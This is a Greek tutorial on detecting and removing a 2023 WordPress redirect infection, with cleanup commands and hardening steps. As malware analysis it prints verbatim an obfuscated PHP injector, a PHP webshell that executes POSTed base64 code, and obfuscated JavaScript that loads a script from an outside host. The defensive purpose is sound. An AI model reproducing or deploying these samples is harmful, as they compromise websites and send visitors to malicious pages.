Fix Redirect WordPress Hack 2023 (Ιός ανακατεύθυνσης)

WordPress είναι σίγουρα η πιο χρησιμοποιούμενη πλατφόρμα CMS (Content Management System) τόσο για ιστολόγια όσο και για starter ηλεκτρονικά καταστήματα (με την ενότητα WooCommerce), γεγονός που το καθιστά το πιο στοχευμένο από επιθέσεις υπολογιστών (hacking). Μία από τις πιο χρησιμοποιούμενες λειτουργίες πειρατείας στοχεύει στην ανακατεύθυνση του παραβιασμένου ιστότοπου σε άλλες ιστοσελίδες. Redirect WordPress Hack Το 2023 είναι ένα σχετικά νέο κακόβουλο λογισμικό που έχει ως αποτέλεσμα την ανακατεύθυνση ολόκληρου του ιστότοπου σε ανεπιθύμητες ιστοσελίδες ή που με τη σειρά του μπορεί να μολύνει τους υπολογιστές των χρηστών.

Εάν ο ιστότοπός σας αναπτύχθηκε στις WordPress ανακατευθύνεται σε άλλο ιστότοπο, τότε πιθανότατα είναι το θύμα του ήδη διάσημου hack ανακατεύθυνσης.

Σε αυτό το σεμινάριο θα βρείτε τις απαραίτητες πληροφορίες και χρήσιμες συμβουλές με τις οποίες μπορείτε να απο-ιώσετε έναν ιστότοπο που έχει μολυνθεί με ανακατεύθυνση WordPress Hack (Virus Redirect). Μέσα από τα σχόλια μπορείτε να λάβετε πρόσθετες πληροφορίες ή να ζητήσετε βοήθεια.

Καμπίνα

Ανίχνευση του ιού που ανακατευθύνει τους ιστότοπους WordPress

Μια ξαφνική και αδικαιολόγητη μείωση της επισκεψιμότητας της ιστοσελίδας, η μείωση του αριθμού των παραγγελιών (στην περίπτωση των ηλεκτρονικών καταστημάτων) ή των διαφημιστικών εσόδων είναι τα πρώτα σημάδια ότι κάτι δεν πάει καλά. Ανίχνευση "Redirect WordPress Hack 2023" (Ανακατεύθυνση ιού) μπορεί επίσης να γίνει "οπτικά" όταν ανοίγετε τον ιστότοπο και ανακατευθυνθείτε σε άλλη ιστοσελίδα.

Από την εμπειρία, τα περισσότερα κακόβουλα προγράμματα ιστού είναι συμβατά με προγράμματα περιήγησης στο Διαδίκτυο: Chrome, Firefox, Edge, Opera. Εάν είστε χρήστης υπολογιστή Mac, αυτοί οι ιοί δεν είναι πραγματικά ορατοί στο πρόγραμμα περιήγησης Safari. Σύστημα ασφαλείας από Safari μπλοκάρετε σιωπηλά αυτά τα κακόβουλα σενάρια.

Τι να κάνετε εάν έχετε μολυνθεί ιστότοπος Redirect WordPress Hack

Ελπίζω ότι το πρώτο βήμα δεν είναι να πανικοβληθείτε ή να διαγράψετε τον ιστότοπο. Ακόμη και μολυσμένα αρχεία ή αρχεία ιού δεν πρέπει να διαγραφούν στην αρχή. Περιέχουν πολύτιμες πληροφορίες που μπορούν να σας βοηθήσουν να κατανοήσετε πού βρίσκεται η παραβίαση ασφαλείας και τι επηρέασε τον ιό. Τρόπος λειτουργίας.

Κλείστε την ιστοσελίδα για το κοινό.

Πώς κλείνεις έναν ιστότοπο για ιούς στους επισκέπτες; Το πιο απλό είναι να χρησιμοποιήσετε τον διαχειριστή DNS και να διαγράψετε την IP για το "A" (το όνομα τομέα) ή να ορίσετε μια ανύπαρκτη IP. Έτσι, οι επισκέπτες του ιστότοπου θα προστατεύονται από αυτό redirect WordPress hack που μπορεί να τους οδηγήσει σε ιστοσελίδες από ιούς ή SPAM.

Εάν χρησιμοποιείτε CloudFlare ως διαχειριστής DNS, συνδέεστε στον λογαριασμό και διαγράφετε τις εγγραφές DNS "A” για το όνομα τομέα. Έτσι, ο τομέας που επηρεάζεται από τον ιό θα παραμείνει χωρίς IP, χωρίς να είναι πλέον δυνατή η πρόσβαση από το Διαδίκτυο.

Αντιγράφετε την IP της ιστοσελίδας και την «δρομολογείτε» ώστε να έχετε πρόσβαση μόνο εσείς. Από τον υπολογιστή σας.

Πώς να αλλάξετε την πραγματική IP ενός ιστότοπου σε υπολογιστές Windows?

Η μέθοδος χρησιμοποιείται συχνά για τον αποκλεισμό της πρόσβασης σε ορισμένους ιστότοπους με την επεξεργασία του αρχείου "κεντρικοί υπολογιστές".

1. Ανοίγεις Notepad ή άλλο πρόγραμμα επεξεργασίας κειμένου (με δικαιώματα administrator) και επεξεργαστείτε το αρχείο "hosts". Βρίσκεται στο:

C:\Windows\System32\drivers\etc\hosts

2. Στο αρχείο "hosts", προσθέστε "route" στην πραγματική IP της ιστοσελίδας σας. Η IP διαγράφηκε παραπάνω από τον διαχειριστή DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Αποθηκεύστε το αρχείο και αποκτήστε πρόσβαση στον ιστότοπο στο πρόγραμμα περιήγησης.

Εάν ο ιστότοπος δεν ανοίγει και δεν έχετε κάνει τίποτα λάθος στο αρχείο "κεντρικοί υπολογιστές", πιθανότατα πρόκειται για προσωρινή μνήμη DNS.

Για εκκαθάριση της προσωρινής μνήμης DNS σε ένα λειτουργικό σύστημα Windows, Άνοιξε Command Prompt, όπου εκτελείτε την εντολή:

ipconfig /flushdns

Πώς να αλλάξετε την πραγματική IP ενός ιστότοπου σε υπολογιστές Mac / MacΒιβλίο?

Για χρήστες υπολογιστών Mac είναι κάπως πιο απλό να αλλάξετε την πραγματική IP ενός ιστότοπου.

1. Ανοίξτε το βοηθητικό πρόγραμμα Terminal.

2. Εκτελέστε τη γραμμή εντολών (απαιτείται κωδικός πρόσβασης συστήματος για να εκτελεστεί):

sudo nano /etc/hosts

3. Το ίδιο με τους υπολογιστές Windows, προσθέστε την πραγματική IP του τομέα.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Αποθηκεύστε τις αλλαγές. Ctrl+X (y).

Αφού έχετε "δρομολογήσει", είστε το μόνο άτομο με το οποίο μπορείτε να αποκτήσετε πρόσβαση στον μολυσμένο ιστότοπο Redirect WordPress Hack.

Πλήρες αντίγραφο ασφαλείας ιστότοπου – Αρχεία και βάση δεδομένων

Ακόμα κι αν έχει μολυνθεί με «redirect WordPress hack”, η σύσταση είναι να δημιουργήσετε ένα γενικό αντίγραφο ασφαλείας ολόκληρου του ιστότοπου. Αρχεία και βάση δεδομένων. Ενδεχομένως θα μπορούσατε επίσης να αποθηκεύσετε ένα τοπικό αντίγραφο και των δύο αρχείων από public / public_html καθώς και τη βάση δεδομένων.

Αναγνώριση μολυσμένων αρχείων και όσων τροποποιήθηκαν από Redirect WordPress Hack 2023

Τα κύρια αρχεία στόχου του WordPress υπάρχουν index.php (στη ρίζα), header.php, index.php και footer.php του θέματος WordPress περιουσιακά στοιχεία. Ελέγξτε με μη αυτόματο τρόπο αυτά τα αρχεία και εντοπίστε κακόβουλο κώδικα ή σενάριο κακόβουλου λογισμικού.

Το 2023, ένας ιός του «Redirect WordPress Hack"βάλε μέσα index.php κωδικός της φόρμας:

(Δεν συνιστώ την εκτέλεση αυτών των κωδικών!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Αποκωδικοποιημένο, αυτό κακόβουλο σενάριο είναι βασικά η συνέπεια της μόλυνσης του ιστότοπου WordPress. Δεν είναι το σενάριο πίσω από το κακόβουλο λογισμικό, είναι το σενάριο που καθιστά δυνατή την ανακατεύθυνση της μολυσμένης ιστοσελίδας. Αν αποκωδικοποιήσουμε το παραπάνω σενάριο, παίρνουμε:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Για να προσδιορίσετε όλα τα αρχεία στον διακομιστή που περιέχουν αυτόν τον κωδικό, καλό είναι να έχετε πρόσβαση SSH στον διακομιστή για να εκτελέσετε τις γραμμές εντολών ελέγχου και διαχείρισης αρχείων Linux.

Συγγενεύων: Πώς να μάθετε εάν το ιστολόγιό σας έχει μολυνθεί ή όχι, με βοήθεια Google Search . (WordPress Ιός)

Ακολουθούν δύο εντολές που είναι σίγουρα χρήσιμες για τον εντοπισμό αρχείων που τροποποιήθηκαν πρόσφατα και αρχείων που περιέχουν έναν συγκεκριμένο κώδικα (string).

Πώς βλέπεις Linux Τα αρχεία PHP άλλαξαν τις τελευταίες 24 ώρες ή κάποιο άλλο χρονικό πλαίσιο;

Σειρά "find” είναι πολύ απλό στη χρήση και επιτρέπει την προσαρμογή για να ορίσετε τη χρονική περίοδο, τη διαδρομή προς την αναζήτηση και τον τύπο των αρχείων.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Στην έξοδο θα λάβετε πληροφορίες σχετικά με την ημερομηνία και την ώρα τροποποίησης του αρχείου, τα δικαιώματα εγγραφής / ανάγνωσης / εκτέλεσης (chmod) και σε ποια ομάδα / χρήστη ανήκει.

Εάν θέλετε να ελέγξετε περισσότερες ημέρες πριν, αλλάξτε την τιμή "-mtime -1"ή χρησιμοποιήστε "-mmin -360” για λεπτά (6 ώρες).

Πώς να αναζητήσετε έναν κώδικα (string) μέσα σε αρχεία PHP, Java;

Η γραμμή εντολών "εύρεση" που σας επιτρέπει να βρείτε γρήγορα όλα τα αρχεία PHP ή Java που περιέχουν έναν συγκεκριμένο κώδικα είναι η εξής:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Η εντολή θα αναζητήσει και θα εμφανίσει τα αρχεία .php και .js που περιέχει "uJjBRODYsU".

Με τη βοήθεια των δύο παραπάνω εντολών θα μάθετε πολύ εύκολα ποια αρχεία έχουν τροποποιηθεί πρόσφατα και ποια περιέχουν κώδικα κακόβουλου λογισμικού.

Αφαιρεί κακόβουλο κώδικα από τροποποιημένα αρχεία χωρίς να θέτει σε κίνδυνο τον σωστό κώδικα. Στο δικό μου σενάριο, το κακόβουλο λογισμικό τοποθετήθηκε πριν από το άνοιγμα <head>.

Κατά την εκτέλεση της πρώτης εντολής "εύρεση", είναι πολύ πιθανό να ανακαλύψετε νέα αρχεία στον διακομιστή, τα οποία δεν είναι δικά σας WordPress ούτε να τεθεί εκεί από εσάς. Αρχεία που ανήκουν σε τύπο ιού Redirect WordPress Hack.

Στο σενάριο που ερεύνησα, αρχεία του εντύπου «wp-log-nOXdgD.php". Πρόκειται για αρχεία "spawn" που περιέχουν επίσης κώδικα κακόβουλου λογισμικού που χρησιμοποιείται από τον ιό για ανακατεύθυνση.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Ο σκοπός των αρχείων τύπου "wp-log-*” είναι η διάδοση του ιού hack ανακατεύθυνσης σε άλλους ιστότοπους που φιλοξενούνται στον διακομιστή. Είναι ένας κωδικός κακόβουλου λογισμικού του τύπου "webshell” που αποτελείται από α βασική ενότητα (στο οποίο ορίζονται ορισμένες κρυπτογραφημένες μεταβλητές) και ιε ενότητα εκτέλεσης μέσω του οποίου ο εισβολέας προσπαθεί να φορτώσει και να εκτελέσει έναν κακόβουλο κώδικα στο σύστημα.

Αν υπάρχει μεταβλητή POST με το όνομα 'bhκαι την κρυπτογραφημένη του αξία MD5 είναι ίσο με "8f1f964a4b4d8d1ac3f0386693d28d03", τότε το σενάριο εμφανίζεται να γράφει το κρυπτογραφημένο περιεχόμενο base64 μιας άλλης μεταβλητής που ονομάζεται 'b3' σε ένα προσωρινό αρχείο και στη συνέχεια προσπαθεί να συμπεριλάβει αυτό το προσωρινό αρχείο.

Αν υπάρχει μεταβλητή POST ή GET με το όνομα 'tick', το σενάριο θα απαντήσει με την τιμή MD5 της χορδής"885".

Για να αναγνωρίσετε όλα τα αρχεία στον διακομιστή που περιέχουν αυτόν τον κώδικα, επιλέξτε μια κοινή συμβολοσειρά και, στη συνέχεια, εκτελέστε την εντολή "find” (παρόμοιο με το παραπάνω). Διαγράψτε όλα τα αρχεία που περιέχουν αυτόν τον κώδικα κακόβουλου λογισμικού.

Ελάττωμα ασφαλείας που εκμεταλλεύεται Redirect WordPress Hack

Πιθανότατα αυτός ο ιός ανακατεύθυνσης φτάνει μέσω εκμετάλλευση του χρήστη διαχείρισης WordPress ή προσδιορίζοντας α ευάλωτο πρόσθετο που επιτρέπει την προσθήκη χρηστών με προνόμια του administrator.

Για τους περισσότερους ιστότοπους που έχουν δημιουργηθεί στην πλατφόρμα WordPress είναι δυνατόν επεξεργασία αρχείων θέματος ή προσθηκώναπό τη διεπαφή διαχείρισης (Dashboard). Έτσι, ένα κακόβουλο άτομο μπορεί να προσθέσει κώδικα κακόβουλου λογισμικού στα αρχεία θεμάτων για να δημιουργήσει τα σενάρια που εμφανίζονται παραπάνω.

Ένα παράδειγμα τέτοιου κώδικα κακόβουλου λογισμικού είναι αυτό:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript που προσδιορίζεται στην κεφαλίδα του θέματος WordPress, αμέσως μετά το άνοιγμα της ετικέτας <head>.

Είναι αρκετά δύσκολο να αποκρυπτογραφήσει αυτό το JavaScript, αλλά είναι προφανές ότι ζητά μια άλλη διεύθυνση ιστού από όπου πιθανότατα ανασύρει άλλα σενάρια για τη δημιουργία των αρχείων "wp-log-*” για το οποίο μίλησα παραπάνω.

Βρείτε και διαγράψτε αυτόν τον κώδικα από όλα τα αρχεία PHP επηρεάζονται.

Από όσο μπορούσα να καταλάβω, αυτός ο κωδικός ήταν προστέθηκε χειροκίνητα από νέο χρήστη με δικαιώματα διαχειριστή.

Έτσι, για να αποτρέψετε την προσθήκη κακόβουλου λογισμικού από τον Πίνακα ελέγχου, είναι καλύτερο να απενεργοποιήσετε την επιλογή επεξεργασίας WordPress Θέματα / Προσθήκες από τον πίνακα ελέγχου.

Επεξεργαστείτε το αρχείο wp-config.php και προσθέστε τις γραμμές:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Μετά την πραγματοποίηση αυτής της αλλαγής, κανένας χρήστης WordPress δεν θα μπορείτε πλέον να επεξεργάζεστε αρχεία από τον Πίνακα ελέγχου.

Ελέγξτε τους χρήστες με ρόλο Administrator

Παρακάτω είναι ένα ερώτημα SQL που μπορείτε να χρησιμοποιήσετε για να αναζητήσετε χρήστες με το ρόλο του administrator στην πλατφόρμα WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Αυτό το ερώτημα θα επιστρέψει όλους τους χρήστες στον πίνακα wp_users που ανέθεσε το ρόλο του administrator. Το ερώτημα γίνεται και για τον πίνακα wp_usermeta για αναζήτηση στο meta'wp_capabilities', το οποίο περιέχει πληροφορίες σχετικά με τους ρόλους των χρηστών.

Μια άλλη μέθοδος είναι να τα αναγνωρίσετε από: Dashboard → Users → All Users → Administrator. Ωστόσο, υπάρχουν πρακτικές με τις οποίες ένας χρήστης μπορεί να κρυφτεί στον πίνακα ελέγχου. Έτσι, ο καλύτερος τρόπος για να δείτε τους χρήστες "Administrator"Σε WordPress είναι η παραπάνω εντολή SQL.

Στην περίπτωσή μου, αναγνώρισα στη βάση δεδομένων τον χρήστη με το όνομα "wp-import-user". Αρκετά υποδηλωτικό.

Επίσης από εδώ μπορείτε να δείτε την ημερομηνία και την ώρα που ο χρήστης WordPress δημιουργήθηκε. Το αναγνωριστικό χρήστη είναι επίσης πολύ σημαντικό επειδή αναζητά τα αρχεία καταγραφής διακομιστή. Με αυτόν τον τρόπο μπορείτε να δείτε όλη τη δραστηριότητα αυτού του χρήστη.

Διαγραφή χρηστών με ρόλο administrator που δεν το ξέρεις λοιπόν αλλαγή κωδικών πρόσβασης σε όλους τους διαχειριστές χρήστες. Συντάκτης, Συγγραφέας, Administrator.

Αλλάξτε τον κωδικό πρόσβασης του χρήστη της βάσης δεδομένων SQL του επηρεαζόμενου ιστότοπου.

Αφού ακολουθήσετε αυτά τα βήματα, ο ιστότοπος μπορεί να επανεκκινηθεί για όλους τους χρήστες.

Λάβετε υπόψη, ωστόσο, ότι αυτό που παρουσίασα παραπάνω είναι ένα από τα χιλιάδες ίσως σενάρια στα οποία ένας ιστότοπος έχει μολυνθεί με Redirect WordPress Hack το 2023.

Εάν ο ιστότοπός σας έχει μολυνθεί και χρειάζεστε βοήθεια ή εάν έχετε ερωτήσεις, η ενότητα σχολίων είναι ανοιχτή.